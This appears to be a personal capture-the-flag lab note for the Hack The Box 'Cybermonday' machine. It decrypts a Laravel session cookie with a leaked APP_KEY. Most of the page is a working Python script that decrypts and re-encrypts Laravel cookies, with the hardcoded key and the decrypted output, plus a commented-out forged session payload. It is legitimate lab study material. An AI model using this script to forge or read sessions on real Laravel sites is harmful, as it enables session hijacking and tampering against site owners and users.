InfoSec LAB

Cybermonday_Laravel_Session_Cookie_Decryption

Created: 2 min read

Laravel Session Cookie Decryption

There are 2 cookies; XSRF-TOKEN and cybermonday_session since xsrf-token is a default cookie used in Laravel for Cross-Site Request Forgery (CSRF) protection, I will go with the cybermonday_session cookie of the authenticated user (test)

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ hurl -u 'eyJpdiI6InIzZThQL09teWJSRldJc0lZUDEyZXc9PSIsInZhbHVlIjoiMWk2T3o1Y1h6Qk5uWE5NcVBEUHZNcEhSb1NIdzJrNDE2Zmt2UnAvRVE4SWRBQTFKcXhicE5rVXZ3K0U5eDd3Qy9DaCtjR2tNckF0QmZUb2RtWThzNWw5dVY1QnplN0ZGb1E1c3htYVZ2TDhKZ004MWtLNGZNOFdBcXpsZE52TGoiLCJtYWMiOiI3ZDc1ZjQyOGMyZTQ0MjI5ODg4MDQ0MTBjMmNjYzhkZTI4YzM1MWIwNmFmMjQ3ZTliMTg1MjI5MmI5MDEzYzVlIiwidGFnIjoiIn0%3D'
 
original    :: eyJpdiI6InIzZThQL09teWJSRldJc0lZUDEyZXc9PSIsInZhbHVlIjoiMWk2T3o1Y1h6Qk5uWE5NcVBEUHZNcEhSb1NIdzJrNDE2Zmt2UnAvRVE4SWRBQTFKcXhicE5rVXZ3K0U5eDd3Qy9DaCtjR2tNckF0QmZUb2RtWThzNWw5dVY1QnplN0ZGb1E1c3htYVZ2TDhKZ004MWtLNGZNOFdBcXpsZE52TGoiLCJtYWMiOiI3ZDc1ZjQyOGMyZTQ0MjI5ODg4MDQ0MTBjMmNjYzhkZTI4YzM1MWIwNmFmMjQ3ZTliMTg1MjI5MmI5MDEzYzVlIiwidGFnIjoiIn0%3D
url decoded :: eyJpdiI6InIzZThQL09teWJSRldJc0lZUDEyZXc9PSIsInZhbHVlIjoiMWk2T3o1Y1h6Qk5uWE5NcVBEUHZNcEhSb1NIdzJrNDE2Zmt2UnAvRVE4SWRBQTFKcXhicE5rVXZ3K0U5eDd3Qy9DaCtjR2tNckF0QmZUb2RtWThzNWw5dVY1QnplN0ZGb1E1c3htYVZ2TDhKZ004MWtLNGZNOFdBcXpsZE52TGoiLCJtYWMiOiI3ZDc1ZjQyOGMyZTQ0MjI5ODg4MDQ0MTBjMmNjYzhkZTI4YzM1MWIwNmFmMjQ3ZTliMTg1MjI5MmI5MDEzYzVlIiwidGFnIjoiIn0=

Then I will first URL-decode the cookie, so it will become the base64 string that I can work with

import os
import json
import hashlib
import sys
import hmac
import base64
import string
import requests
from Crypto.Cipher import AES
from phpserialize import loads, dumps
 
#https://gist.github.com/bluetechy/5580fab27510906711a2775f3c4f5ce3
 
def mcrypt_decrypt(value, iv):
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.decrypt(value)
 
 
def mcrypt_encrypt(value, iv):
    global key
    AES.key_size = [len(key)]
    crypt_object = AES.new(key=key, mode=AES.MODE_CBC, IV=iv)
    return crypt_object.encrypt(value)
 
 
def decrypt(bstring):
    global key
    dic = json.loads(base64.b64decode(bstring).decode())
    mac = dic['mac']
    value = bytes(dic['value'], 'utf-8')
    iv = bytes(dic['iv'], 'utf-8')
    if mac == hmac.new(key, iv+value, hashlib.sha256).hexdigest():
        return mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))
        #return loads(mcrypt_decrypt(base64.b64decode(value), base64.b64decode(iv))).decode()
    return ''
 
 
def encrypt(string):
    global key
    iv = os.urandom(16)
    #string = dumps(string)
    padding = 16 - len(string) % 16
    string += bytes(chr(padding) * padding, 'utf-8')
    value = base64.b64encode(mcrypt_encrypt(string, iv))
    iv = base64.b64encode(iv)
    mac = hmac.new(key, iv+value, hashlib.sha256).hexdigest()
    dic = {'iv': iv.decode(), 'value': value.decode(), 'mac': mac}
    return base64.b64encode(bytes(json.dumps(dic), 'utf-8'))
 
app_key ='EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA='
key = base64.b64decode(app_key)
decrypted = decrypt('eyJpdiI6InIzZThQL09teWJSRldJc0lZUDEyZXc9PSIsInZhbHVlIjoiMWk2T3o1Y1h6Qk5uWE5NcVBEUHZNcEhSb1NIdzJrNDE2Zmt2UnAvRVE4SWRBQTFKcXhicE5rVXZ3K0U5eDd3Qy9DaCtjR2tNckF0QmZUb2RtWThzNWw5dVY1QnplN0ZGb1E1c3htYVZ2TDhKZ004MWtLNGZNOFdBcXpsZE52TGoiLCJtYWMiOiI3ZDc1ZjQyOGMyZTQ0MjI5ODg4MDQ0MTBjMmNjYzhkZTI4YzM1MWIwNmFmMjQ3ZTliMTg1MjI5MmI5MDEzYzVlIiwidGFnIjoiIn0=')
print(decrypted)
#b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"vYzY0IdalD2ZC7v9yopWlnnYnCB2NkCXPbzfQ3MV\\";s:8:\\"username\\";s:8:\\"guestc32\\";s:5:\\"order\\";s:2:\\"id\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605140631}\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e\x0e'
#encrypt(b'{"data":"a:6:{s:6:\\"_token\\";s:40:\\"RYB6adMfWWTSNXaDfEw74ADcfMGIFC2SwepVOiUw\\";s:8:\\"username\\";s:8:\\"guest60e\\";s:5:\\"order\\";s:8:\\"lolololo\\";s:9:\\"direction\\";s:4:\\"desc\\";s:6:\\"_flash\\";a:2:{s:3:\\"old\\";a:0:{}s:3:\\"new\\";a:0:{}}s:9:\\"_previous\\";a:1:{s:3:\\"url\\";s:38:\\"http:\\/\\/206.189.25.23:31031\\/api\\/configs\\";}}","expires":1605141157}')

then i can use this python script to decrypt the cybermonday_session cookie with the secret key found earlier

┌──(kali㉿kali)-[~/archive/htb/labs/cybermonday]
└─$ python3 decrypt_laravel_cookie.py 
b'25c6a7ecd50b519b7758877cdc95726f29500d4c|JKWALJ4QOBcyb5sgRAtTddJlKNwgQ6rtsOokplkw\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f'

Executing the Python script outputs a byte string 25c6a7ecd50b519b7758877cdc95726f29500d4c|JKWALJ4QOBcyb5sgRAtTddJlKNwgQ6rtsOokplkw appears to be the actual result and the rest is just a placeholder Continuing to the assessment

Interactive Graph View

Backlinks